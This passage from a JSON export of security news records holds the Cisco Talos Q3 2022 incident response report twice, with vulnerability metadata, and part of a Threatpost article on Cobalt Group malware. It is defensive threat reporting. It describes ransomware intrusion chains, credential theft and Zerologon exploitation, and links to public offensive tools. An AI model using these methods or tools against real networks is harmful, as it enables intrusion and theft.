Cybersecurity and Infrastructure Security Agency (CISA) reporting](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>). Analysis of the event logs revealed numerous outbound remote desktop protocol (RDP) connection attempts from an infected host to other systems, indicating the adversary moved laterally. Further analysis identified indicators for remote access software AnyDesk and TeamViewer, where over 50 systems were observed reaching out to TeamViewer-related URLs. An exception was also added to the Windows Defender firewall exemption list for \u201cAnyDesk.exe\u201d executions by the SYSTEM account. The likely trigger for ransomware was PsExec execution followed by deployment of ransomware, which was written to the Windows Roaming profile of the compromised user. \n\nIn recent months, Talos observed [ongoing Qakbot](<https://blog.talosintelligence.com/2022/07/quarterly-report-incident-response.html>) activity leveraging [thread hijacking](<https://blog.talosintelligence.com/2022/07/what-talos-incident-response-learned.html>) and password-protected ZIP files to enhance legitimacy. For example, in a ransomware engagement affecting a U.S.-based IT company, Talos IR observed multiple IP addresses associated with command and control (C2) traffic to/from compromised endpoints associated with Qakbot. The attackers likely gained initial access via a phishing email with an HTML attachment that, once opened, initiated JavaScript that subsequently downloaded a malicious password-protected ZIP file. The ZIP file contained a Windows shortcut file (LNK) that, once downloaded and executed on the victim system, delivers Qakbot. The adversaries eventually dropped the ransomware Black Basta, which we had not previously observed in Talos IR engagements. In the past six months, we\u2019ve seen Qakbot use several different infection chains, including potentially moving away from LNK files in some campaigns.\n\nTalos has been monitoring the disclosure of \u201cLockBit Black,\u201d the builder for the [LockBit 3.0 ransomware encryptor](<https://www.buzzsprout.com/2018149/11457844>), leaked publicly in late September 2022 by an alleged LockBit coder/developer. This leak is among many setbacks this group has experienced in recent months, including[ distributed denial-of-service (DDoS) attacks](<https://blog.talosintelligence.com/2022/09/ransomware-leaksite-ddos.html>) targeting the group\u2019s data leaks site. While Talos IR did not observe any LockBit ransomware engagements this quarter, the builder could make attribution more difficult involving typical LockBit tactics, techniques, and procedures (TTPs) as more threat actors incorporate the builder in their own ransomware operations. Talos has already begun tracking one new ransomware group dubbed \u201cBlooDy Gang\u201d which has reportedly used the leaked [LockBit 3.0 builder](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>) in recent ransomware attacks. This could enable even more ransomware groups to save time and resources by relying on leaked builders and source code of other ransomware operations, as opposed to independently developing ransomware. \n\n \n\n\n## Uptick in pre-ransomware behaviors \n\n \n\n\nWhile ransomware was the top threat this quarter, we also observed an equal number of engagements involving various pre-ransomware behaviors. Although each pre-ransomware engagement involves unique behaviors and TTPs, the overwhelming similarities among these engagements include host enumeration, multiple credential-harvesting activities, and attempts to escalate privileges via an identified weakness or vulnerability in order to move laterally to other systems. In some instances where ransomware was never deployed, the adversary was likely trying to exfiltrate data at the time of detection, indicating they had broad enough access to cause significant harm at that time.\n\nIn a pre-ransomware engagement affecting a European energy company, Talos IR observed the installation of Cobalt Strike and Mimikatz. The customer first observed Cobalt Strike installation and/or Mimikatz invocation affecting nearly 100 servers. Talos IR detected traffic associated with Metasploit Framework\u2019s Meterpreter shell originating from a compromised host. Seven minutes later, the system attempted to reach out to a confirmed Cobalt Strike C2 server. PowerShell commands and scripts revealed a lightweight Cobalt Strike loader likely associated with Cobalt Strike SMB lateral beaconing. Other tools observed in the environment include the Active Directory mapping tool SharpHound and Rubeus, a Kerberoasting tool.\n\n \n\n\n## Multiple publicly available tooling and scripts support adversary objectives\n\nWe observed adversaries leveraging a variety of publicly available tools and scripts hosted on GitHub repositories or free to download from third-party websites to support operations across multiple stages of the attack lifecycle. To support an adversary's objectives, we commonly observed offensive security and red-team tools, such as the modularized Cobalt Strike framework and Active Directory reconnaissance tools ADFind and BloodHound. However, the presence of these additional scripts and tools indicates that adversaries are continuing to identify publicly available resources, which adds convenience but muddies attribution.\n\nIn a pre-ransomware incident affecting a U.S. manufacturer, the adversary logged in and executed a publicly available [PowerShell script](<https://github.com/dafthack/DomainPasswordSpray>) (\u201cDomainPasswordSpray.ps1\u201d) to perform password spraying against the domain. A technique to obtain credentials, password spraying is performed by using a single password, or a list of commonly used passwords, against many different accounts to attempt to validate credentials and gain access. The PowerShell script will result in large numbers of account lockouts, which match the activity reported by the customer. Talos IR also identified the presence of SharpZeroLogon, an exploit for the Zerologon (CVE-2020-1472) privilege escalation vulnerability, which is [publicly available on GitHub](<https://github.com/leitosama/SharpZeroLogon>). Ultimately, this allows an attacker to take control of a domain controller by resetting the account of the targeted domain controller, potentially leading to a full domain admin compromise.\n\nTalos has been monitoring the increased use of dual-use tools such as [Cobalt Strike](<https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html>), Brute Ratel, Sliver, and Manjusaka. Brute Ratel is of particular concern since the toolkit was [cracked](<https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/>) in late September and is being shared for free across several hacking forums and communities. Additionally, endpoint telemetry revealed an attack chain with Qakbot dropping Brute Ratel. Although we have not yet observed Brute Ratel in any Talos IR engagements, we assess that the tool\u2019s rise in the cyber threat landscape in recent months, coinciding with Qakbot operators\u2019 use and the cracked version, will likely lead to more threat actors adopting the post-exploitation kit into their operations.\n\nOf note, a majority of the publicly available tooling leveraged this quarter appears focused on accessing and collecting credentials, highlighting the role these tools play in potentially furthering an adversary\u2019s objectives.\n\n[.jpg)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaZK3JendaC7sWS3QLLGwdVUkl_udaxhvzBGYUDTtE6YZVjj_2T0QfMmGMDdW3K4OMUzfplZtBn5cUd8aU9rg1N9tbzrUKFXq83Hw7lBzqpzi2B_MfO7lzqe207bLxFyXiAYankpaMZXUorz7eLXPe17933rGlpm-w3UkLpa75mh5r1zttZaVrvOku/s2001/Tools-dark\\(1\\).jpg>)\n\n \n\n\n## Initial vectors\n\nThis quarter featured several engagements where attackers leveraged valid accounts to gain initial access, especially in cases where accounts were misconfigured, not disabled properly, or had weak passwords. In at least two engagements this quarter, Talos IR investigated the possibility of initial adversary access via a compromised contractor\u2019s network or a contractor\u2019s personal computer.\n\n[.jpg)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEhDV1DJrGyZH4ZfYoekMfS9PN4tJHt9IuorO1sW1vyygTIldDXZMYLiCIrH9nA5aMUrid4VkV8q82ppJ8PoFLiUNbQ7zETzCiWv8lBLhohRGChJ2hx2urV_OmDK6grlOzFv0iPfboBsVTxXpEC0XYoBTRf8Pii-13bZFHUnKz7qagoI5HgM7yaBBW/s2001/InfectionVectors-dark\\(1\\).jpg>)\n\n \n\n\n \n\n\nIn nearly 15 percent of engagements this quarter, adversaries identified and/or exploited misconfigured public-facing applications by conducting SQL injection attacks against external websites, exploiting Log4Shell in vulnerable versions of VMware Horizon, and targeting misconfigured and/or publicly exposed servers.\n\nWe continued to see [successful Log4Shell (CVE-2021-44228, CVE-2021-45046, and related flaws) exploitation attempts](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) followed by a variety of malicious activities, such as cryptocurrency mining and ransomware. In a Hive ransomware incident affecting a U.S. education institution, Talos IR observed multiple Log4Shell exploitation attempts against a vulnerable VMware Horizon server, the most notable of these attempts resulted in a Cobalt Strike beacon dropped on the server. Talos IR also identified high volumes of cryptocurrency miners, which are common post-exploitation payloads associated with activity targeting the Log4j vulnerabilities. While we could not link the Hive affiliate to the Log4j exploitation attempts, VMware and its respective logs revealed that the server was public-facing, suggesting that more than one adversary may have attempted to target this vulnerability.\n\nThe next most common initial infection vector came via email followed by user execution of a malicious document or link. In one of the business email compromise (BEC) engagements affecting a U.S. financial services organization, the adversaries used thread-hijacking and a malicious email link which appeared to be a fake authentication page that collected user credentials upon entering. The adversary also enabled email inbox rules in an attempt to gain persistence on the compromised email account. \n\nIt is important to note that for the majority of incidents, Talos IR could not reasonably determine the initial vector because of logging deficiencies or a lack of visibility into the affected environment.\n\n \n\n\n## Security weaknesses\n\nA lack of MFA remains one of the biggest impediments to enterprise security. Nearly 18 percent of engagements either had no MFA or only had it enabled on a handful of accounts and critical services. Talos IR frequently observes ransomware and phishing incidents that could have been prevented if MFA had been properly enabled on critical services, such as endpoint detection and response (EDR) solutions. Talos IR recommends disabling VPN access for all accounts that are not using two-factor authentication. \n\nIn what appears to be a prevalent theme this quarter, in 27 percent of engagements password or account access was not properly configured/disabled, leaving these accounts functionally active and allowing adversaries to use valid credentials to enter the environment. In a few cases, organizations did not properly disable account access after an employee left the organization. Talos IR\u2019s recommendation is to disable or delete inactive accounts from Active Directory to prevent suspicious activity. \n\n \n\n\n## Top-observed MITRE ATT&amp;CK techniques\n\nBelow is a list of the MITRE ATT&amp;CK techniques observed in this quarter\u2019s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.\n\n#### Key findings from the MITRE ATT&amp;CK appendix include: \n\n * Legitimate remote access software, such as AnyDesk and TeamViewer, was leveraged in nearly a quarter of engagements.\n * In an ongoing trend, adversaries leveraged valid accounts for initial access, especially notable where accounts were misconfigured or had weak passwords.\n * We observed adversaries transferring tools or scripts from external systems or adversary-controlled infrastructure into a compromised environment, referred to as ingress tool transfer. The adversaries frequently downloaded these tools from public sites such as GitHub.\n * We observed adversaries deploying Cobalt Strike and Mimikatz across several pre-ransomware engagements. In cases where ransomware encryption took place, PsExec usage played a large role in executing ransomware in 75 percent of ransomware engagements this quarter.\n\n \n\n\n \nTactic | \nTechnique | \nExample \n---|---|--- \n \nInitial Access (TA0001) | \nT1078 Valid Accounts | \nAdversary leveraged stolen or compromised credentials \n \nReconnaissance (TA0043) | \nT1592 Gather Victim Host Information | \nText file contains details about host \n \nPersistence (TA0003) | \nT1136 Create Account | \nCreated a user to add to the local administrator\u2019s group \n \nExecution (TA0002) | \nT1059.001 Command and Scripting Interpreter: PowerShell | \nExecutes PowerShell code to retrieve information about the client's Active Directory environment \n \nDiscovery (TA0007) | \nT1482 Domain Trust Discovery | \nUse various utilities to identify information on domain trusts \n \nCredential Access (TA0006) | \nT1003 OS Credential Dumping | \nDeploy Mimikatz and publicly available password lookup utilities \n \nPrivilege Escalation (TA0004) | \nT1068 Exploitation for Privilege Escalation | \nExploit ZeroLogon to escalate privileges with a direct path to a compromised domain \n \nLateral Movement (TA0008) | \nT1021.001 Remote Desktop Protocol | \nAdversary made attempts to move laterally using Windows Remote Desktop \n \nDefense Evasion (TA0005) | \nT1027 Obfuscated Files or Information | \nUse base64-encoded PowerShell scripts \n \nCommand and Control (TA0011) | \nT1105 Ingress Tool Transfer | \nAdversaries transfer/download tools from an external system \n \nImpact (TA0040) | \nT1486 Data Encrypted for Impact | \nDeploy Hive ransomware and encrypt critical systems \n \nExfiltration (TA0010) | \nT1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage | \nActor exfiltrated data to file sharing site mega[.]nz \n \nCollection (TA0009) | \nT1074 Data Staged | \nStage data in separate output files \n \nSoftware/Tool | \nS0002 Mimikatz | \nUse Mimikatz to obtain account logins and passwords", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-25T12:00:00", "type": "talosblog", "title": "Quarterly Report: Incident Response Trends in Q3 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-10-25T12:00:00", "id": "TALOSBLOG:AFFA9F54A1744A8B65903B06E9C56C3A", "href": "http://blog.talosintelligence.com/2022/10/quarterly-report-incident-response.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-03T15:20:29", "description": "### Ransomware and pre-ransomware engagements make up 40 percent of threats seen this quarter\n\n\n\nFor the first time since compiling these reports, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter.\n\nIt can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place. However, Talos IR assesses that the [combination of Cobalt Strike](<https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf>) and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective.\n\nThis quarter featured a variety of publicly available tools and scripts hosted on GitHub repositories or other third-party websites to support operations across multiple stages of the attack lifecycle. This activity coincides with a general increase in the use of other dual-use tools, such as the legitimate red-teaming tool Brute Ratel and the recently discovered [Manjusaka](<https://blog.talosintelligence.com/manjusaka-offensive-framework/>) and [Alchimist](<https://blog.talosintelligence.com/alchimist-offensive-framework/>) attack frameworks.\n\n\n\n## Targeting\n\nAttackers targeted the education sector the most of any vertical this quarter, closely followed by the financial services, government, and energy sectors, respectively. For the first time since Q4 2021, telecommunications was not the top-targeted vertical. While the reason for the education sector being more frequently targeted this quarter is unknown, this is a popular time of year for adversaries to target education institutions as students and teachers return to school.\n\n\n\n## Ransomware\n\nWe observed two previously seen high-profile ransomware families, Vice Society and [Hive](<https://blog.talosintelligence.com/conti-and-hive-ransomware-operations/>). This quarter also saw a ransomware family that had yet to be observed in IR engagements, Black Basta, which first emerged in April 2022.\n\nTalos IR responded to a Vice Society ransomware engagement affecting an education institution in Austria, part of an ongoing trend of Vice Society actors disproportionately targeting the education sector, which is consistent with [U.S. Cybersecurity and Infrastructure Security Agency (CISA) reporting](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>). Analysis of the event logs revealed numerous outbound remote desktop protocol (RDP) connection attempts from an infected host to other systems, indicating the adversary moved laterally. Further analysis identified indicators for remote access software AnyDesk and TeamViewer, where over 50 systems were observed reaching out to TeamViewer-related URLs. An exception was also added to the Windows Defender firewall exemption list for &quot;AnyDesk.exe&quot; executions by the SYSTEM account. The likely trigger for ransomware was PsExec execution followed by deployment of ransomware, which was written to the Windows Roaming profile of the compromised user.\n\nIn recent months, Talos observed [ongoing Qakbot](<https://blog.talosintelligence.com/what-talos-incident-response-learned/>) activity leveraging [thread hijacking](<https://duo.com/decipher/qakbot-attack-uses-email-threads-hijacked-from-proxylogon-compromises>) and password-protected ZIP files to enhance legitimacy. For example, in a ransomware engagement affecting a U.S.-based IT company, Talos IR observed multiple IP addresses associated with command and control (C2) traffic to/from compromised endpoints associated with Qakbot. The attackers likely gained initial access via a phishing email with an HTML attachment that, once opened, initiated JavaScript that subsequently downloaded a malicious password-protected ZIP file. The ZIP file contained a Windows shortcut file (LNK) that, once downloaded and executed on the victim system, delivers Qakbot. The adversaries eventually dropped the ransomware Black Basta, which we had not previously observed in Talos IR engagements. In the past six months, we&#x27;ve seen Qakbot use several different infection chains, including potentially moving away from LNK files in some campaigns.\n\nTalos has been monitoring the disclosure of &quot;LockBit Black,&quot; the builder for the LockBit 3.0 ransomware encryptor, leaked publicly in late September 2022 by an alleged LockBit coder/developer. This leak is among many setbacks this group has experienced in recent months, including distributed denial-of-service (DDoS) attacks targeting the group&#x27;s data leaks site. While Talos IR did not observe any LockBit ransomware engagements this quarter, the builder could make attribution more difficult involving typical LockBit tactics, techniques, and procedures (TTPs) as more threat actors incorporate the builder in their own ransomware operations. Talos has already begun tracking one new ransomware group dubbed &quot;BlooDy Gang&quot; which has reportedly used the leaked LockBit 3.0 builder in recent ransomware attacks. This could enable even more ransomware groups to save time and resources by relying on leaked builders and source code of other ransomware operations, as opposed to independently developing ransomware. \n\n\n## Uptick in pre-ransomware behaviors\n\nWhile ransomware was the top threat this quarter, we also observed an equal number of engagements involving various pre-ransomware behaviors. Although each pre-ransomware engagement involves unique behaviors and TTPs, the overwhelming similarities among these engagements include host enumeration, multiple credential-harvesting activities, and attempts to escalate privileges via an identified weakness or vulnerability in order to move laterally to other systems. In some instances where ransomware was never deployed, the adversary was likely trying to exfiltrate data at the time of detection, indicating they had broad enough access to cause significant harm at that time.\n\nIn a pre-ransomware engagement affecting a European energy company, Talos IR observed the installation of Cobalt Strike and Mimikatz. The customer first observed Cobalt Strike installation and/or Mimikatz invocation affecting nearly 100 servers. Talos IR detected traffic associated with Metasploit Framework&#x27;s Meterpreter shell originating from a compromised host. Seven minutes later, the system attempted to reach out to a confirmed Cobalt Strike C2 server. PowerShell commands and scripts revealed a lightweight Cobalt Strike loader likely associated with Cobalt Strike SMB lateral beaconing. Other tools observed in the environment include the Active Directory mapping tool SharpHound and Rubeus, a Kerberoasting tool.\n\n## Multiple publicly available tooling and scripts support adversary objectives\n\nWe observed adversaries leveraging a variety of publicly available tools and scripts hosted on GitHub repositories or free to download from third-party websites to support operations across multiple stages of the attack lifecycle. To support an adversary&#x27;s objectives, we commonly observed offensive security and red-team tools, such as the modularized Cobalt Strike framework and Active Directory reconnaissance tools ADFind and BloodHound. However, the presence of these additional scripts and tools indicates that adversaries are continuing to identify publicly available resources, which adds convenience but muddies attribution.\n\nIn a pre-ransomware incident affecting a U.S. manufacturer, the adversary logged in and executed a publicly available PowerShell script (&quot;DomainPasswordSpray.ps1&quot;) to perform password spraying against the domain. A technique to obtain credentials, password spraying is performed by using a single password, or a list of commonly used passwords, against many different accounts to attempt to validate credentials and gain access. The PowerShell script will result in large numbers of account lockouts, which match the activity reported by the customer. Talos IR also identified the presence of SharpZeroLogon, an exploit for the Zerologon (CVE-2020-1472) privilege escalation vulnerability, which is [publicly available on GitHub](<https://www.cisa.gov/uscert/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>). Ultimately, this allows an attacker to take control of a domain controller by resetting the account of the targeted domain controller, potentially leading to a full domain admin compromise.\n\nTalos has been monitoring the increased use of dual-use tools such as Cobalt Strike, Brute Ratel, Sliver, and Manjusaka. Brute Ratel is of particular concern since the toolkit was [cracked](<https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/>) in late September and is being shared for free across several hacking forums and communities. Additionally, endpoint telemetry revealed an attack chain with Qakbot dropping Brute Ratel. Although we have not yet observed Brute Ratel in any Talos IR engagements, we assess that the tool&#x27;s rise in the cyber threat landscape in recent months, coinciding with Qakbot operators&#x27; use and the cracked version, will likely lead to more threat actors adopting the post-exploitation kit into their operations.\n\nOf note, a majority of the publicly available tooling leveraged this quarter appears focused on accessing and collecting credentials, highlighting the role these tools play in potentially furthering an adversary&#x27;s objectives.\n\n\n\n## Initial vectors\n\nThis quarter featured several engagements where attackers leveraged valid accounts to gain initial access, especially in cases where accounts were misconfigured, not disabled properly, or had weak passwords. In at least two engagements this quarter, Talos IR investigated the possibility of initial adversary access via a compromised contractor&#x27;s network or a contractor&#x27;s personal computer.\n\n\n\nIn nearly 15 percent of engagements this quarter, adversaries identified and/or exploited misconfigured public-facing applications by conducting SQL injection attacks against external websites, exploiting Log4Shell in vulnerable versions of VMware Horizon, and targeting misconfigured and/or publicly exposed servers.\n\nWe continued to see [successful Log4Shell (CVE-2021-44228, CVE-2021-45046, and related flaws) exploitation attempts](<https://blog.talosintelligence.com/apache-log4j-rce-vulnerability/>) followed by a variety of malicious activities, such as cryptocurrency mining and ransomware. In a Hive ransomware incident affecting a U.S. education institution, Talos IR observed multiple Log4Shell exploitation attempts against a vulnerable VMware Horizon server, the most notable of these attempts resulted in a Cobalt Strike beacon dropped on the server. Talos IR also identified high volumes of cryptocurrency miners, which are common post-exploitation payloads associated with activity targeting the Log4j vulnerabilities. While we could not link the Hive affiliate to the Log4j exploitation attempts, VMware and its respective logs revealed that the server was public-facing, suggesting that more than one adversary may have attempted to target this vulnerability.\n\nThe next most common initial infection vector came via email followed by user execution of a malicious document or link. In one of the business email compromise (BEC) engagements affecting a U.S. financial services organization, the adversaries used thread-hijacking and a malicious email link which appeared to be a fake authentication page that collected user credentials upon entering. The adversary also enabled email inbox rules in an attempt to gain persistence on the compromised email account.\n\nIt is important to note that for the majority of incidents, Talos IR could not reasonably determine the initial vector because of logging deficiencies or a lack of visibility into the affected environment.\n\n## Security weaknesses\n\nA lack of MFA remains one of the biggest impediments to enterprise security. Nearly 18 percent of engagements either had no MFA or only had it enabled on a handful of accounts and critical services. Talos IR frequently observes ransomware and phishing incidents that could have been prevented if MFA had been properly enabled on critical services, such as endpoint detection and response (EDR) solutions. Talos IR recommends disabling VPN access for all accounts that are not using two-factor authentication.\n\nIn what appears to be a prevalent theme this quarter, in 27 percent of engagements password or account access was not properly configured/disabled, leaving these accounts functionally active and allowing adversaries to use valid credentials to enter the environment. In a few cases, organizations did not properly disable account access after an employee left the organization. Talos IR&#x27;s recommendation is to disable or delete inactive accounts from Active Directory to prevent suspicious activity.\n\n## Top-observed MITRE ATT&amp;CK techniques\n\nBelow is a list of the MITRE ATT&amp;CK techniques observed in this quarter&#x27;s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.\n\n#### Key findings from the MITRE ATT&amp;CK appendix include:\n\n * Legitimate remote access software, such as AnyDesk and TeamViewer, was leveraged in nearly a quarter of engagements.\n * In an ongoing trend, adversaries leveraged valid accounts for initial access, especially notable where accounts were misconfigured or had weak passwords.\n * We observed adversaries transferring tools or scripts from external systems or adversary-controlled infrastructure into a compromised environment, referred to as ingress tool transfer. The adversaries frequently downloaded these tools from public sites such as GitHub.\n * We observed adversaries deploying Cobalt Strike and Mimikatz across several pre-ransomware engagements. In cases where ransomware encryption took place, PsExec usage played a large role in executing ransomware in 75 percent of ransomware engagements this quarter.\n\n \n\n\n \nTactic| \nTechnique| \nExample \n---|---|--- \n \nInitial Access (TA0001)| \nT1078 Valid Accounts| \nAdversary leveraged stolen or compromised credentials \n \nReconnaissance (TA0043)| \nT1592 Gather Victim Host Information| \nText file contains details about host \n \nPersistence (TA0003)| \nT1136 Create Account| \nCreated a user to add to the local administrator&#x27;s group \n \nExecution (TA0002)| \nT1059.001 Command and Scripting Interpreter: PowerShell| \nExecutes PowerShell code to retrieve information about the client&#x27;s Active Directory environment \n \nDiscovery (TA0007)| \nT1482 Domain Trust Discovery| \nUse various utilities to identify information on domain trusts \n \nCredential Access (TA0006)| \nT1003 OS Credential Dumping| \nDeploy Mimikatz and publicly available password lookup utilities \n \nPrivilege Escalation (TA0004)| \nT1068 Exploitation for Privilege Escalation| \nExploit ZeroLogon to escalate privileges with a direct path to a compromised domain \n \nLateral Movement (TA0008)| \nT1021.001 Remote Desktop Protocol| \nAdversary made attempts to move laterally using Windows Remote Desktop \n \nDefense Evasion (TA0005)| \nT1027 Obfuscated Files or Information| \nUse base64-encoded PowerShell scripts \n \nCommand and Control (TA0011)| \nT1105 Ingress Tool Transfer| \nAdversaries transfer/download tools from an external system \n \nImpact (TA0040)| \nT1486 Data Encrypted for Impact| \nDeploy Hive ransomware and encrypt critical systems \n \nExfiltration (TA0010)| \nT1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage| \nActor exfiltrated data to file sharing site mega[.]nz \n \nCollection (TA0009)| \nT1074 Data Staged| \nStage data in separate output files \n \nSoftware/Tool| \nS0002 Mimikatz| \nUse Mimikatz to obtain account logins and passwords", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-25T12:00:00", "type": "talosblog", "title": "Quarterly Report: Incident Response Trends in Q3 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-10-25T12:00:00", "id": "TALOSBLOG:C9F50677FB4030903E6114F7C17FD8DB", "href": "https://blog.talosintelligence.com/quarterly-report-incident-response-trends-in-q3-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-11-04T07:15:20", "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, of the Cobalt Group remains active.\n * A new version on the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses a XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": 